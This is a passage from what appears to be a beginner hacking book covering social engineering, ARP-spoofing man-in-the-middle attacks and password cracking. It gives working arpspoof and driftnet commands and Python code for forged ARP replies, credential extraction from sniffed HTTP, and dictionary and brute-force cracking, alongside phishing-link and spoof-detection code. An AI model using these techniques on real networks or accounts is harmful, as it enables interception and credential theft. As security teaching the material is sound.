entry to the network, then they will proceed with reconnaissance 
techniques and scanning procedures. However, sometimes hackers 
employ social engineering to acquire banking credentials or local 
computer credentials in order to install a virus or Trojan. The point is 
that social engineering is typically one of the first steps an attacker 
takes to carry out a grander scheme. 


And guess what? It’s one heck of a lot easier for a hacker to trick 
someone into giving up their information than it is to hack into their 
computers and take it by force. Part of this is just due to psychology. 
You’ll find that people are quick to guard their personal 
information and question where their personal data goes when they 
enter it online, but when talking with a real-life human being they are 
a lot more lax. Sure, you may have misgivings about giving your 
Social Security Number to a stranger over the phone, but consider a 
short scenario. Let’s say you are an accountant working in a medium- 
sized firm and you simply don’t know everyone who works at your 
company personally. One day you get a call explaining that there were 
some network issues yesterday and every account needs to be reset (or 
some other believable yet bogus excuse) or your account will get 
locked out of the corporate network resources. If the social engineer 
did a good job of impersonating someone from your firm’s IT 
department, chances are you would give them your username and 
password. 


That brings us to one of the most fundamental aspects of security. You 
simply need to know who to trust and what online resources to trust. 
There’s an old adage that will ensure that you never misplace your 
trust again: trust, but verify! You have no idea whether or not that 
person on the phone is legitimate. The biggest challenge large 
organizations face with social engineering is the trust factor, because 
their entire network could be compromised by one individual who just 
takes everything at face value. 


Take physical security and defense as an analogy. It doesn’t matter 
how high your castle walls are, how many troops you have deployed, 
how large your spear infantry is, or how strong your mounted cavalry 
units are; it only takes one idiot to see a wooden horse as a wooden 
horse and the next thing you know your empire has crumbled. On a 
side note, I would probably say that the modern equivalent example of 
a Trojan horse is a burglar who pretends to be a pizza man, but I think 
you see the point. Once a hacker gathers critical information with 
social engineering, an entire business network could easily be in 
jeopardy. 


Types of Social Engineering Attacks 


There are several common attack methods that criminals and hackers 
love to use for social engineering purposes because they have a high 
success rate. You’d think the general public would have learned their 
lessons by now, but the ugly truth is that some people still fall victim 
to these types of attacks because they are naive, gullible, or overly 
trusting. The following are some of the most popular social 
engineering methods hackers love to use. 


An Email from a Trusted Party 


Don’t offer up your credentials to anyone, and I mean anyone, 
including your close friends. Unfortunately, hackers have been able to 
expand their access to a network after successfully hacking a computer 
by duping users in the attacked PC’s contact list into forfeiting more 
information. By using an email account from the computer they 
hacked, the hacker is able to take advantage of the trust relationship 
between the person they are emailing and the person they have 
hacked. 


But watch out! Attackers’ attempts to gather information are usually a 
lot more sophisticated than an email saying something to the effect of, 
“Hey Steve, can you give your username and password for 
www.example.com? I forgot my password.” Sometimes they will 
include a link to another site in an effort to employ a phishing attack. 
Other times they may send a toxic link to a resource they control that 
looks genuine, but they include a vague message such as, “Hey John, 
you gotta check this thing out!” Once you click on the bad link, a 
virus or some sort of malware could easily be downloaded to your 
computer. 


Even more worrisome is an email that contains a link to a download. 
It could look like a content download such as music, video content, or 
pictures, but the download link will actually point to a malicious code 
download. After a successful attack, the hacker will be able to access 
your computer, email program, and other sensitive information. And 
now the attacker has a whole new email address book to use to 
facilitate further attacks, and the vicious cycle repeats itself. 


Be warned. Hackers love to manipulate and take advantage of the 
emotions of human beings by urgently asking for help that is needed 
immediately. Sometimes they will appeal to your good nature and ask 
you to make a charitable contribution to someone in need. Though it 
is heartbreaking to try to separate the wheat from the chaff and know 
if you are truly helping someone out, you need to protect yourself and 
not donate any money if you can’t verify the company and link as a 
reputable organization. 


A False Request for Help 


Sometimes hackers will send messages that appear to be from a 
legitimate company that claim they are responding to a request that 
you never made. Often they will imitate a large and reputable 
corporation with thousands upon thousands of users to increase their 
chance of success. If you never requested aid from them, you need to 
avoid that email like the plague. The real problem here is the scenario 
where you do use a product or service from the company they are 
imitating, though. 


Even though you didn’t originally ask for their help, you may still be 
enticed into wanting what they offer. For example, let’s say that the 
hacker is impersonating a representative of a large bank and that 
there was a reporting error that caused the bank to make an error that 
needs to be verified. Because you want to make sure that your money 
is safe, you decide to trust this false representative. But here comes 
the catch. The hacker is going to claim that they need to first 
“authenticate your information” to see if your account was affected by 
the “error.” You give them your credentials, and the next thing you 
know you have been robbed blind. 


Other times a hacker or bottom-feeding Internet huckster will try to 
class up a false claim that seems believable in order to take your 
money. These emails almost always employ urgency to motivate their 
targets to take action. My perception of these attempts is that they are 
nothing short of unadulterated knee-slapping gut-busting laugh-until- 
you-pass-out hilarity. But the sad truth is that they work, and some 
people mistakenly place trust in a stranger they have never met 
before. To illustrate these types of attacks, let’s turn to the iconic 
Nigerian Prince scam. 


This scam was in full swing during the 80’s and the early 90’s, but 
there have been many other copycat hucksters that created their own 
variations of the scam. In its infancy, the scam was actually sent 
through the public mail system. However, at the time email was an 
emerging trend and since it was all the rage, it only follows naturally 
that these scams started finding their way into email inboxes. In the 
classic Nigerian Prince scam, an impersonator of a high-ranking 
Nigerian official (sometimes a businessman, other times members of 
the royal family) would send an email claiming that he wished to send 
millions of dollars into the account of the target. But why would 
anyone want to give away that much money? The thin lie that so 
many people ate up like candy was that the money was reserved for a 
political budget but it was never actually spent. As a side note, have 
you ever heard of a politician that failed to spend their entire budget 
(and then some)? Of course not! But if you would be so kind as to help 
this Nigerian Prince, you would get to keep a quarter or a third of the 
total value of the bank transfer. In the end, a lot of poor, gullible, 
unfortunate souls became even poorer when they offered up their 
banking credentials. 


Baiting Targets 


Any baiting scheme is going to revolve around the appearance that the 
attacker is offering something of value. Many times you will see these 
types of social engineering attacks in pop-up ads or on torrent 
websites. The bait is frequently a free book, movie, or game that the 
target thinks is legitimate when in reality, it is a link to malicious 
code. Unfortunately, some of these offers look very real — they can 
take the form of a hot deal in a classified ad or a deal found in an 
Internet marketplace or false e-commerce site. These are hard to spot 
as scams because the attacker has found ways to manipulate the 
system to give themselves a favorable and trustworthy rating. Once 
you have been duped into following the link or download, the attacker 
has successfully injected a malicious program, virus, or malware onto 
your computer and has a foothold to carry out further attacks. 


How to Protect Yourself from Social Engineering 


Social engineering is a huge problem because it evolves with 
technology, and you can’t always know whether or not someone is 
legitimate. Fortunately, there are a lot of things you can do to reduce 
the chance that you are victimized by an attacker using these 
techniques. 


First of all, be sure to take your time and think about the 
consequences of your actions beforehand. Attackers would love it if 
you just reacted to a situation without thinking about what you are 
doing, but take a moment to think ahead — even if the message claims 
an urgent scenario. 


Also make sure that you take time to verify and validate any 
information that looks odd or suspicious. Go through their claims with 
a fine tooth comb and remember to remain skeptical. Even if you get a 
message from a company you do business with, check where a link 
really goes (hover over it, or look at the address bar after it 
opens) rather than trusting the text you see, and make sure the 
destination matches the company’s real domain, not a look-alike 
with the real name tucked in front of a different domain. If they 
provide their phone number, you can do a reverse phone lookup on 
the Internet to cross-check their validity, or call the number 
printed on your card or statement instead. Make sure that you never 
respond to an email that requests information such as your username 
or password. Reputable companies would never ask for your password 
in an email. 


In addition, make certain that you never respond to false messages 
claiming to be a response to help you never requested. Delete 
these before ever opening them, because they could contain links to 
malware. The best way to combat bad links is to reach the site by 
legitimate means. For example, don’t follow the link in an email if 
you want to verify it. Instead, type the address you already know 
or use a bookmark; a search engine is a reasonable fallback, 
although attackers do sometimes push fake sites up the rankings, 
so still check the domain before you log in. 
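The link checks described above can be automated. The following is an added example, not code from the book: it pulls every link out of an email body and applies the rules just discussed (HTTPS only, no user-info trick before the host, no punycode look-alike, the host must really belong to the expected domain, and the visible text must not name a different site than the one the link goes to). SAMPLE_EMAIL is a constructed message and ALLOWED_DOMAINS is a hypothetical list of domains the reader actually does business with.

```python
"""Flag suspicious links in an e-mail body (added example, not from the book).

SAMPLE_EMAIL is a constructed message; ALLOWED_DOMAINS is a hypothetical
list of the domains the recipient really does business with.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_DOMAINS = {"example-bank.com"}   # hypothetical: the real domain you know

SAMPLE_EMAIL = """
<p>We detected unusual activity. Please
   <a href="http://example-bank.com.verify-login.net/reset">sign in</a>.</p>
<p>Or use <a href="https://secure@example-bank.com.evil.net/">https://example-bank.com/account</a></p>
<p>Statement: <a href="https://www.example-bank.com/statements">view</a></p>
<p>Hosted at <a href="https://xn--exmple-bank-mnb.com/">example-bank.com</a></p>
"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> in the message."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_allowed(host):
    """True only if host IS an allowed domain or a real subdomain of it.
    'example-bank.com.evil.net' ends with 'evil.net', so it must NOT match."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


def shown_host(text):
    """Hostname the visible link text appears to name, or '' if it isn't URL-like."""
    t = text.strip()
    if not t or " " in t or "." not in t:
        return ""
    return urlsplit(t if "://" in t else "//" + t).hostname or ""


def check_link(href, text):
    """Return the reasons to distrust this link (an empty list means it passed)."""
    findings = []
    parts = urlsplit(href)
    host = (parts.hostname or "").rstrip(".")
    if parts.scheme != "https":
        findings.append("not https")
    if "@" in parts.netloc:          # https://bank@evil.net actually goes to evil.net
        findings.append("userinfo before host")
    if host.startswith("xn--") or ".xn--" in host:   # internationalised look-alike
        findings.append("punycode host")
    if not host_allowed(host):
        findings.append(f"host {host!r} is not in {sorted(ALLOWED_DOMAINS)}")
    shown = shown_host(text)
    if shown and shown != host:      # text names one site, href goes to another
        findings.append(f"display text {shown!r} != href host {host!r}")
    return findings


def scan_email(html):
    """Return [(href, findings), ...] for every link in the message."""
    parser = LinkCollector()
    parser.feed(html)
    return [(href, check_link(href, text)) for href, text in parser.links]


if __name__ == "__main__":
    for href, findings in scan_email(SAMPLE_EMAIL):
        print(href, "->", "OK" if not findings else "; ".join(findings))
```

Only the third link survives: it is HTTPS and its host is a genuine subdomain of the expected domain. The first fails on the scheme and on the host, the second on the user-info trick and on the mismatch between what the text says and where the link goes, and the fourth on the punycode host.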


Chapter 14 — Man-In-The-Middle Attacks 


Man-in-the-middle attacks are extremely dangerous for end users 
because a successful attack will allow a hacker to view all of the data 
that a user is sending over the network. Whatever is sent in plain 
text (old-style HTTP, unencrypted email, FTP) can be read outright, 
including which websites the user visits, usernames, passwords, and 
even payment card data. Encrypted connections such as a VPN tunnel or 
an HTTPS session are a different story: the attacker sees only 
ciphertext, unless the client fails to check who it is talking to, in 
which case the attacker can impersonate the VPN server or website and 
the user hands the session, and everything in it, straight to the 
attacker. That is why certificate warnings matter. 


An attacker performs this exploit by tricking the target’s computer 
into thinking that the attacker’s computer is the default gateway or 
intended destination for data transmissions. For example, let’s say that 
you wanted to do a Google search. Normally, your data would be sent 
to your default gateway (e.g. your wireless router), routed through the 
public Internet, and then reach one of Google’s servers. However, with 
a man-in-the-middle attack, your data would first be sent to a hacker 
somewhere in the middle of the process before reaching Google’s 
servers. 


These attacks are problematic because, from the user’s side, it is 
very difficult to notice that data is taking a detour through a hacker 
before it reaches the intended destination. Hackers know this, and 
their goal is to sit back quietly and discreetly listen to all of the 
traffic you are sending without your knowledge. (On the network side 
the attack is noisier than it looks: the spoofed binding shows up as 
the gateway’s IP address suddenly sharing a MAC address with another 
host, which is exactly what tools such as arpwatch exist to catch.) 


Though there are many ways to initiate this type of attack, such as 
with a DNS attack that redirects information to a hacker’s IP address, 
they are most frequently carried out with a process called ARP 
spoofing. If you remember, I had introduced you to the concept of 
ARP in chapter 5. If you don’t remember, realize that ARP is the 
process that links a layer 2 address (MAC address) with a layer 3 
address (IP address). 


With ARP spoofing, the goal is to trick the target host into thinking 
that the hacker’s MAC address is bound to the default gateway’s IP 
address. That way the target will send any data that is not destined for 
a device on the local network to the hacker first. In turn, the hacker 
will then send the target’s data to the default gateway and out to the 
public Internet. 


While the basics of understanding a man-in-the-middle attack using 
ARP spoofing are rather straightforward, ARP spoofing is only half of 
the battle. Once you have tricked a client into sending you their 
data, how do you see and read what they have sent? This brings us to 
the idea of tools called packet sniffers. A packet sniffer will show 
you all of the data flowing over your computer’s network interface 
card. The details of the information contained in the packet sniffer 
data are rather complex, but you can sort through all of the data 
using filters. One of the easiest packet sniffers to use is 
Wireshark, which runs on Windows, Linux and Mac, and Linux also ships 
terminal-based sniffers such as tcpdump. You even have the ability to 
store and save all of the data you have collected from a target and 
sift through the information at your own leisure. 


As this is an advanced topic, you likely won’t understand all of the 
various protocols you see in the data collected from your packet 
sniffer. However, as a demo aimed at beginners, you can sort through 
the data by filtering results for port 80 (HTTP), which will show you 
the IP addresses and Host headers of the web servers the target is 
connecting to over plain HTTP. For those sites this shows you every 
page the victim visited as well as other information such as 
usernames and passwords submitted in forms. Port 443 (HTTPS) traffic 
will still tell you which servers were contacted, but the pages and 
credentials inside it are encrypted. 


Though some sites still send logins in plain text that you can read 
straight from your packet sniffer, most today use HTTPS. What you 
capture from those sessions is ciphertext, and you cannot recover the 
session key from the capture: the only practical way to read that 
traffic is to impersonate the site with your own certificate and hope 
the victim clicks through the warning, which is both harder and 
squarely black hat territory. So, for those reasons, I will show you 
how to initiate a man-in-the-middle attack with ARP spoofing and how 
to use a packet sniffer to see what websites a target is connecting 
to. Also, understand that packet sniffing on a wireless interface is 
a little different than sniffing on an Ethernet interface. For that 
reason, this demo will show you how to perform the attack on a wired 
Ethernet interface. 


How to Perform a Man-In-The-Middle Attack 


To start the attack, we first need to successfully spoof an ARP binding. 
To do so, we are going to use a tool on Kali Linux called ‘arpspoof.’ 
The syntax for this command is as follows: 


-sudo arpspoof -i eth0 -t [TARGET ADDRESS] [DEFAULT GATEWAY ADDRESS] 


So, if you wanted to trick a host on your local network with the 
address of 192.168.1.10 into thinking you were the default gateway, 
the command would look like this: 


-sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 


If you don’t know your default gateway address, use the ipconfig 
command in Windows or look at the routing table in Linux (ifconfig 
only lists your own addresses; the gateway is the default route). If 
you didn’t know of any valid host IP addresses to target, you could 
simply issue a simple ping sweep using NMAP as we did in chapter 7. 
The command listed above will trick the 192.168.1.10 host into 
believing your computer’s MAC address is associated with the default 
gateway’s IP address of 192.168.1.1. At this point your terminal 
window will continually print a line for each forged ARP reply it 
sends (the spoof has to be repeated, or the target’s real ARP entry 
would come back), so you will need to open another terminal window to 
proceed with the attack. 


But there’s just one problem. You have only done half of the spoofing 
attack. At this point, your target thinks that you are the default 
gateway, but this isn’t true in the reverse process. That is to say that 
the default gateway doesn’t think you are the target host! So, in your 
new terminal window we are going to need to start another ARP 
spoofing procedure. The syntax will be the same, except the target and 
default gateway addresses will be swapped as follows: 


-sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.10 


At this point in the attack, you have fooled the default gateway 
into thinking that you are the target host and you have fooled the 
target into thinking that you are the default gateway. One thing the 
two arpspoof commands do not do for you is forward the traffic: 
unless IP forwarding is enabled on your Kali machine (the 
net.ipv4.ip_forward setting), the target’s packets stop at your 
network card, the target loses its Internet connection, and the 
attack gives itself away. Turn it on before you start. Now all you 
need is for the target to transmit data and to inspect that data on 
your computer. There are some higher level tools that will pick out 
specific content from the traffic for you, but a packet sniffer 
showing the raw data offers a wealth of information too. Remember to 
keep both of the previous terminal windows open as they are still 
constantly running the ARP spoofing process. 
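To make the two halves of the spoof concrete, here is an added example (not code from the book or from the dsniff project that ships arpspoof) that builds, byte for byte, the forged ‘is-at’ replies the two arpspoof commands above repeat on the wire: one telling 192.168.1.10 that 192.168.1.1 lives at the attacker’s MAC, one telling the gateway the reverse. It also includes a small arpwatch-style detector that watches a stream of replies and raises an alert when an IP address changes MAC or one MAC starts claiming several addresses, which is how the attack looks from the defender’s side. The MAC addresses are made up and nothing is transmitted; the frames are only built and parsed in memory.

```python
"""Forged ARP replies and an arpwatch-style detector (added example, not from
the book). Constructed MAC addresses; nothing is sent on the wire.

On a real attacking host, IP forwarding (net.ipv4.ip_forward=1) must also be
enabled, or the victim's traffic dies at the attacker's NIC.
"""
import socket
import struct

ETH_P_ARP = 0x0806


def mac_bytes(mac):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes(int(x, 16) for x in mac.split(":"))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP 'is-at' reply: tells target_ip that sender_ip is at sender_mac."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # hw type Ethernet(1), proto IPv4(0x0800), hw len 6, proto len 4, opcode 2 = reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """(opcode, sender_mac, sender_ip, target_mac, target_ip) from a raw frame."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    opcode = struct.unpack("!H", frame[20:22])[0]
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = socket.inet_ntoa(frame[28:32])
    target_mac = ":".join(f"{b:02x}" for b in frame[32:38])
    target_ip = socket.inet_ntoa(frame[38:42])
    return opcode, sender_mac, sender_ip, target_mac, target_ip


def spoof_pair(attacker_mac, target_mac, target_ip, gw_mac, gw_ip):
    """The two frames a bidirectional arpspoof session keeps re-sending."""
    to_target = build_arp_reply(attacker_mac, gw_ip, target_mac, target_ip)  # "gateway is at me"
    to_gateway = build_arp_reply(attacker_mac, target_ip, gw_mac, gw_ip)     # "target is at me"
    return to_target, to_gateway


class ArpWatch:
    """Remembers IP->MAC bindings; alerts on a changed binding or one MAC owning many IPs."""

    def __init__(self):
        self.table = {}

    def observe(self, frame):
        opcode, sender_mac, sender_ip, _, _ = parse_arp(frame)
        if opcode != 2:
            return []
        alerts = []
        old = self.table.get(sender_ip)
        if old and old != sender_mac:
            alerts.append(f"{sender_ip} changed {old} -> {sender_mac}")
        self.table[sender_ip] = sender_mac
        owners = sorted(ip for ip, mac in self.table.items() if mac == sender_mac)
        if len(owners) > 1:
            alerts.append(f"{sender_mac} claims {owners}")
        return alerts


if __name__ == "__main__":
    ATTACKER, TARGET, GATEWAY = "02:00:00:00:00:aa", "02:00:00:00:00:10", "02:00:00:00:00:01"
    watch = ArpWatch()
    watch.observe(build_arp_reply(GATEWAY, "192.168.1.1", TARGET, "192.168.1.10"))  # legit
    watch.observe(build_arp_reply(TARGET, "192.168.1.10", GATEWAY, "192.168.1.1"))  # legit
    for frame in spoof_pair(ATTACKER, TARGET, "192.168.1.10", GATEWAY, "192.168.1.1"):
        print(parse_arp(frame), watch.observe(frame))
```

Each frame is 42 bytes: a 14-byte Ethernet header and the 28-byte ARP body. The detector is silent for the two genuine replies, flags the gateway’s address changing MAC on the first forged frame, and on the second adds a note that a single MAC now answers for both the gateway and the victim, which is the signature a defender should be alerting on.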


If you want to use a high level tool to see what a target is looking 
at online that isn’t too complex, you might be interested in driftnet. 
Driftnet is a tool that - while far from perfect - is a great way for 
newbies to try their hand at a man-in-the-middle attack: it picks 
images (and, with the right options, MPEG audio) out of the traffic 
it sees and displays the images in a window as they go by. To use 
driftnet, which is packaged with Kali, run the following command: 


-sudo driftnet -i eth0 


If you are doing this demo in your home network environment (as I 
instructed you to do many times already), try running the driftnet 
command. Then, on the target device, browse to a site that still 
serves its pictures over plain HTTP (Google and most large sites use 
HTTPS for everything now, so an image search there will show driftnet 
nothing). The attacking computer that sits in the middle should be 
able to see the images that the target device is viewing. Pretty 
neat, huh? The problem though is that people can abuse these types of 
attacks to get away with murder and steal some truly sensitive 
information. Again, I caution you not to use this technique outside 
of your own home because the consequences could be very severe! 


Lastly, if you want to dig a little deeper with these types of attacks, 
you would want to use a packet sniffer and dig into the raw data that 
your attacking computer is gathering. You can see a lot more than 
simple images, and once you dig into the transmission protocols you 
can find data such as login information, data a user has entered into 
fields on a web form, and just about everything else they send 
without encryption! 
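Here is what that digging looks like once the port-80 filter has done its work, as an added example that is not part of the book: it takes TCP payloads of the kind a port-80 filter in Wireshark or tcpdump would isolate, recognises the ones that are HTTP requests, records which host and page each one asked for, and pulls username and password fields out of any form POST. CAPTURED_PAYLOADS is a constructed list; the last entry is the start of a TLS handshake, included to show that an HTTPS session gives the parser nothing to work with. The field names in CRED_FIELDS are a guess at common form names, not a standard.

```python
"""Extract visited hosts and form logins from captured plain-HTTP requests
(added example, not from the book). CAPTURED_PAYLOADS is constructed; the
third entry is the start of a TLS ClientHello and is deliberately opaque.
"""
from urllib.parse import parse_qs

CAPTURED_PAYLOADS = [
    b"GET /index.html HTTP/1.1\r\nHost: news.example.net\r\nUser-Agent: demo\r\n\r\n",
    (b"POST /login HTTP/1.1\r\nHost: forum.example.org\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n"
     b"username=alice&password=hunter2"),
    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + bytes(32),   # TLS record: ciphertext follows
]

# Guess at common login field names (not a standard).
CRED_FIELDS = {"user", "username", "login", "email", "pass", "password", "passwd", "pwd"}


def parse_http_request(payload):
    """(method, path, headers, body) for an HTTP request payload, else None."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None                       # not an HTTP request line
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return parts[0].decode("latin-1"), parts[1].decode("latin-1"), headers, body


def extract(payloads):
    """Return ([host+path visited, ...], [(host, {field: value}), ...])."""
    hosts, creds = [], []
    for payload in payloads:
        req = parse_http_request(payload)
        if req is None:                   # TLS or other non-HTTP data: nothing readable
            continue
        method, path, headers, body = req
        host = headers.get("host", "?")
        hosts.append(host + path)
        content_type = headers.get("content-type", "")
        if method == "POST" and content_type.startswith("application/x-www-form-urlencoded"):
            form = parse_qs(body.decode("latin-1"))
            found = {k: v[0] for k, v in form.items() if k.lower() in CRED_FIELDS}
            if found:
                creds.append((host, found))
    return hosts, creds


if __name__ == "__main__":
    visited, logins = extract(CAPTURED_PAYLOADS)
    print("visited:", visited)
    print("logins:", logins)
```

Two pages and one login come out; the TLS record is skipped because its first bytes do not form an HTTP request line, which is exactly the point of the earlier caveat about HTTPS.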


Chapter 15: Cracking Passwords 


Though you might not think so at first, your email is actually one of 
the most dangerous accounts to lose to a hacker. The reason being 
that there is so much personal information stored in your inbox. Once 
an attacker has access to your email account, you’re in for a world of 
hurt because they will be able to see and intercept all of the messages 
that reach your inbox. Worse yet is the idea that they now have a way 
to impersonate you. If they wanted to, an attacker could trick other 
people in your address book into forfeiting additional information by 
using your identity to request that information. 


Furthermore, there is going to be a ton of sensitive data linked with 
your email account. Websites today are getting pretty complex, and 
there are a lot of ways to link a user’s login credentials and web 
activity with their email address. For example, there will likely be 
emails and promotions from sites that you have already done business 
with sitting in your inbox or spam folder. This gives an attacker clues 
as to where he or she can look to uncover additional information. 
They may also be able to see what purchases you have made with 
online sites such as Amazon. 


Password Cracking 


While all of these scenarios are terrible, by far the worst advantage an 
attacker gains is the ability to further hack your passwords. There are 
several techniques an attacker can employ, but they all exist to steal 
your credentials to escalate their privileges. For example, who knows 
what an attacker might purchase if he or she had access to your 
Amazon account and payment card data? 


Now that you have a basic understanding of how critical secure 
passwords are and the consequences of what an attacker can do once 
they get your password, let’s look at the basics. I’m sure that cracking 
passwords sounds cool and really complicated, but some of the 
methods used are unbelievably simple and even a little anticlimactic. 


As commonly mentioned throughout this book, don’t try to hack 
someone else’s passwords because the consequences can be terrible if you 
get caught. Don’t try to hack into a person’s email and see how many 
of their accounts you can break into just for the hell of it; that would 
be a huge breach of privacy and I shudder to think what might happen 
if you get caught stealing someone’s payment card data. 


To be honest, it would be pretty difficult for a single user who doesn’t 
have knowledge of information technology to discover how their 
account was hacked in the first place, but in a corporate or 
professional setting the I.T. department would have numerous tools to 
track electronic transactions and discern what IP address the attack or 
attempt was made from. 


The first, and simplest technique for gaining a user’s password 
assumes that you already have access to their email account. Most 
users typically only have one main email account that they use, but 
there could be several. Anyway, after you have obtained access to 
their email you can use the password recovery mechanisms built into 
most online accounts. While most people choose to cache their 
usernames in their browser so they don’t need to reenter them every 
time they log in to a website, you don’t even need to know their 
username. You see, most websites provide an account recovery feature 
that lets a user input their email address to receive a username 
reminder or a link that lets them set a new password. 


Sites don’t mail out the old password (they don’t have it, only a 
hash of it); the recovery feature instead sends a reset link or a 
temporary password to the address on file, and all of that 
information arrives in the inbox the attacker now controls. So, if an 
attacker controlled a user’s email account and wanted access to their 
bank’s website, Amazon account, social media accounts, or just about 
anything else, all the attacker has to do is browse to the given 
website and perform the steps necessary for account recovery. This is 
an extremely quick process, and in a matter of minutes an attacker 
could easily gain access to the most critical sites that the user 
visits. The one thing that reliably stops it is a second factor on 
the account being recovered, which is a good reason to turn one on. 


While this may not be a sexy process, it sure gets the job done and can 
ruin an individual’s personal security. However, this is just the 
simplest measure to crack passwords and it presents a problem. How 
did you gain access to their email in the first place? There are 
countless other ways that an attacker can crack passwords to first gain 
access to the email account. For example, if a user isn’t very 
technically inclined, it is a safe bet that they don’t understand 
anything about password complexity. Though they think they are 
being clever, users are making a huge mistake when they make their 
passwords their birthday, the name of their dog, or other easy to guess 
pieces of information. 


Other times, these simple minded users will actually write their 
passwords down near their computer or plaster a sticky note on their 
monitor. It is even possible to trick these people into forfeiting their 
email passwords with social engineering. All of these methods are 
easier to use than you might think, and it gives an attacker a foothold 
into the rest of their user accounts. 


Password Cracking Utilities 


There are many different password cracking utilities to take advantage 
of, but we are going to take a brief look at the most popular pieces of 
software. Hackers will employ several of these tools in conjunction 
with one another to facilitate their attacks. They simply don’t start 
with a brute force attack because passwords can often be found using 
quicker methods. With that said, a brute force attack is usually the last 
resort when other methods have already failed. 


John the Ripper 


John the Ripper is probably one of the most famous and revered 
password cracking utilities in hacker communities. It is highly 
efficient and effective, but it does have one trait that often keeps 
it out of the hands and minds of newbies: it was developed for 
Unix-like systems and is driven from the command line. It has been 
ported to Windows and Mac, but keep in mind that it is natively a 
Linux application. 


Because some of these tools are exclusively built with Linux in mind, 
you will surely need to get your feet wet with the Linux operating 
system to become a competent hacker. By now you should have 
already setup a Linux environment to run through some of the 
demonstrations in this book using VMWare. If you haven’t already, it 
is high time to build your first Linux environment. 


As with most powerful Linux software, this program is run from the 
command line and can be a little scary if you aren’t already used to 
working from the command line. But that’s just part of the learning 
curve; once you get comfortable in this environment, you'll be able to 
run all kinds of software that is far more powerful than basic GUI 
software like you might find in a Windows environment. However, 
there is a version of this software on Mac devices since Macs derive 
from an old and powerful UNIX distribution called BSD. 


One extremely handy feature of this software is the way it automates 
the cracking process when you run it with no mode specified. To 
start, it tries “single crack” mode, which builds guesses from the 
account’s own username and other fields. If that fails, it moves on 
to a wordlist (dictionary) attack, applying mangling rules that turn 
each word into dozens of variants such as capitalised forms and 
appended digits, which is the hybrid approach. If even the hybrid 
approach fails as well, it resorts to “incremental” mode, a brute 
force attack that tries character combinations in order of 
likelihood. 
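The escalation just described, dictionary first, then mangling rules, then brute force, is easy to see in miniature. The following is an added example, not John the Ripper’s code: it cracks salted SHA-256 hashes (a stand-in for whatever format a real target uses) with the three modes in that order and reports which mode succeeded. The salt, the five-word list and the ‘stolen’ hashes are all constructed for the demo, and the brute-force stage is capped at three lowercase-plus-digit characters so it finishes in a moment; the cost of that stage grows as the character set raised to the length, which is why it always comes last.

```python
"""Dictionary -> hybrid (rules) -> brute force, in the order John the Ripper's
default run escalates (added example, not John's code). Salted SHA-256 stands
in for the real hash format; salt, word list and targets are constructed.
"""
import hashlib
import itertools
import string

WORDLIST = ["123456", "sunshine", "password", "letmein", "dragon"]   # constructed, tiny


def hash_pw(salt, pw):
    """The value the victim system stores; the cracker only compares against it."""
    return hashlib.sha256((salt + pw).encode()).hexdigest()


def mangle(word):
    """Hybrid rules: case changes, leetspeak, then common suffixes on each base form."""
    bases = [word, word.capitalize(), word.upper(),
             word.replace("a", "@").replace("e", "3").replace("o", "0")]
    suffixes = [str(n) for n in range(100)] + ["!", "123", "2020", "!1"]
    seen = set()
    for base in bases:
        for cand in [base] + [base + s for s in suffixes]:
            if cand not in seen:
                seen.add(cand)
                yield cand


def dictionary_attack(salt, target, words):
    """Plain words only: a few hashes per word."""
    for w in words:
        if hash_pw(salt, w) == target:
            return w
    return None


def hybrid_attack(salt, target, words):
    """Every word through the mangling rules: ~400 hashes per word here."""
    for w in words:
        for cand in mangle(w):
            if hash_pw(salt, cand) == target:
                return cand
    return None


def brute_force(salt, target, charset=string.ascii_lowercase + string.digits, max_len=3):
    """Exhaustive search; cost is sum(len(charset)**n), so it is always the last resort."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            cand = "".join(combo)
            if hash_pw(salt, cand) == target:
                return cand
    return None


def crack(salt, target, words=WORDLIST):
    """(mode, password) from the cheapest mode that succeeds, or (None, None)."""
    hit = dictionary_attack(salt, target, words)
    if hit is not None:
        return "dictionary", hit
    hit = hybrid_attack(salt, target, words)
    if hit is not None:
        return "hybrid", hit
    hit = brute_force(salt, target)
    return ("brute-force", hit) if hit is not None else (None, None)


if __name__ == "__main__":
    salt = "s3"
    for secret in ["sunshine", "Password1", "dr@g0n!", "q7z", "correct horse battery"]:
        print(secret, "->", crack(salt, hash_pw(salt, secret)))
```

‘sunshine’ falls to the dictionary, ‘Password1’ and ‘dr@g0n!’ only to the rules, ‘q7z’ only to brute force, and a long passphrase survives all three because it is neither in the list nor short enough to enumerate: the same lesson the chapter draws about password strength.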


Ophcrack 


Ophcrack is the next of the password cracking tools we will discuss, 
and like many of these tools, it is free to download and use. It runs 
